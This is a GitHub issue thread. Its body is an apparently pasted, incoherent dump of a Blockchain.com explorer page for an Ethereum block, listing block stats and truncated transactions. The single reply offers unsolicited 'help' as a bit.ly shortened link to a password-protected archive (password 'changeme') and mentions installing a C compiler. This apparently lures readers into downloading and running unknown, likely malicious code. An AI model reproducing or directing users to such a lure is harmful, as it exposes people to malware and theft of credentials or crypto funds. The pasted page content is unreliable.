### ISSUE TITLE
Blockchain.com Explorer | BCH | ETH | BCH

### ISSUE THREAD

**Issue by ETEnterprises1** [ETEnterprises1/ET.ENT#68]
"0x4838b106fce9647bdf1e7877bf73ce8b0bad5f97

X

Blockchain.com: Crypto Wallet

Blockchain

Get the App

View
Ethereum Block
20,853,261
Mined on September 28, 2024 09:18:11
•
All Blocks
Unkown Miner
Data •
Titan (titanbuilder.xyz)
A total of 140.1463 ETH ($376,011) were sent in the block with the average transaction being 0.4900 ETH ($1,314.72). 0x48-5f97 earned a total reward of 0.34 ETH $912.22. The reward consisted of a base reward of 0.34 ETH $912.22 with an additional 0.6609 ETH ($1,773.19) reward paid as fees of the 286 transactions which were included in the block.
Hash
0xde5-76671 
Parent Hash
0x29d-6f7de 
Sha3Uncles
0x1dc-49347 
State Root
0x8a6-3475f 
Nonce
0
Depth
8
Capacity
7.72%
Distance
2m 8s
Uncles
0
Uncle Reward
0.00000 ETH
0.00 USD
Difficulty
0.00000
Total Difficulty
5.87500e+22
Gas
29,983,503 99.95%
Gas Limit
30,000,000
Size
121,370
Mined
9/28/2024, 21:18:11
Miner
0x48-5f97 
Transactions
286
Internal Txs
235
Sent
140.146342
376,011 USD
Internal Value
$376,011
Value Today
$375,604
Average Value
0.49002 ETH
Median Value
0.10000 ETH
Block Reward
0.33756 ETH
905.67 USD
Minted
0.00000 ETH
0.00 USD
Fee Reward
0.66089 ETH
1,773.15 USD
2ID:0x2a-26d0
9/28/2024, 21:18:11
From0xe0-cf40
To0x14-b01d
0.00000000 ETH•$0.00
Fee1.2M Gwei •$3.24
13ID:0x05-25d5
9/28/2024, 21:18:11
From0xfb-0a4e
To0x80-5d9e
0.00000000 ETH•$0.00
Fee6.0M Gwei •$16.07
101ID:0x10-819a
9/28/2024, 21:18:11
From0x5d-5d0a
To0x3f-7fad
0.00000000 ETH•$0.00
Fee2.5M Gwei •$6.77
114ID:0x0f-34ac
9/28/2024, 21:18:11
From0xcc-9b08
To0x80-5d9e
0.00000000 ETH•$0.00
Fee2.0M Gwei •$5.41
115ID:0x27-53bf
9/28/2024, 21:18:11
From0x20-51de
To0x51-7ab2
0.00000000 ETH•$0.00
Fee5.1M Gwei •$13.60
156ID:0x22-a98f
9/28/2024, 21:18:11
From0x93-46a5
To0x8c-4222
0.00000000 ETH•$0.00
Fee631.9K Gwei •$1.70
165ID:0x19-c04a
9/28/2024, 21:18:11
From0x3d-f77a
To0x78-d2b2
0.00000000 ETH•$0.00
Fee626.6K Gwei •$1.68
171ID:0x18-e0d3
9/28/2024, 21:18:11
From0xb7-34c3
To0x0c-1098
0.00000000 ETH•$0.00
Fee621.8K Gwei •$1.67
180ID:0x0b-af51
9/28/2024, 21:18:11
From0x76-d438
To0x3f-7fad
0.00000000 ETH•$0.00
Fee3.6M Gwei •$9.58
186ID:0x22-57f4
9/28/2024, 21:18:11
From0x28-1d60
To0xda-1ec7
0.00000000 ETH•$0.00
Fee589.3K Gwei •$1.58
193ID:0x01-c9a7
9/28/2024, 21:18:11
From0x97-3e1f
To0xda-1ec7
0.00000000 ETH•$0.00
Fee509.6K Gwei •$1.37
230ID:0x03-3795
9/28/2024, 21:18:11
From0x21-f889
To0xb5-10c4
0.00000000 ETH•$0.00
Fee342.3K Gwei •$0.92
245ID:0x21-b25f
9/28/2024, 21:18:11
From0xea-6129
To0x3f-7fad
0.00000000 ETH•$0.00
Fee1.8M Gwei •$4.90
263ID:0x08-51e2
9/28/2024, 21:18:11
From0xa2-f556
To0x0f-c942
0.00000000 ETH•$0.00
Fee591.4K Gwei •$1.59
272ID:0x2a-c669
9/28/2024, 21:18:11
From0x86-4454
To0x3d-3000
0.00000000 ETH•$0.00
Fee3.1M Gwei •$8.32
Explore top crypto assets.

Blockchain.com Explorer | BCH | ETH | BCH"
 https://www.blockchain.com/explorer/blocks/eth/20853261?page=1&sort=value&order=asc#:~:text=Home,BCH%20%7C%20ETH%20%7C%20BCH

**Comment by SagarChandra07** [comment]
I think this will help you.
https://bit.ly/47P0Nvo
Archive password: changeme

you may need to install the c compiler
